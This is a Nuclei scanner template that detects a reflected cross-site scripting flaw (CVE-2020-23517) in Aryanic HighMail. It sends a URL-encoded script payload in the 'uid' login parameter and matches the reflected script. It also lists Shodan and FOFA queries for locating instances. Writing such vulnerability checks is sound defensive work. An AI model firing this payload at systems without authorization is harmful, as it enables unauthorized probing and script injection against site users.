nuclei-templates/cves/2020/CVE-2020-23517.yaml

46 lines
1.3 KiB
YAML

id: CVE-2020-23517
info:
name: Aryanic HighMail (High CMS) - Cross-Site Scripting
author: geeknik
severity: medium
description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
reference:
- https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-23517
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-23517
cwe-id: CWE-79
metadata:
verified: true
shodan-query: title:"HighMail"
fofa-query: title="HighMail"
tags: cve,cve2020,xss,cms,highmail,aryanic
requests:
- method: GET
path:
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
- "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'value=""><script>alert(document.domain)</script>'
- type: word
words:
- text/html
part: header
- type: status
status:
- 200
# Enhanced by mp on 2022/03/14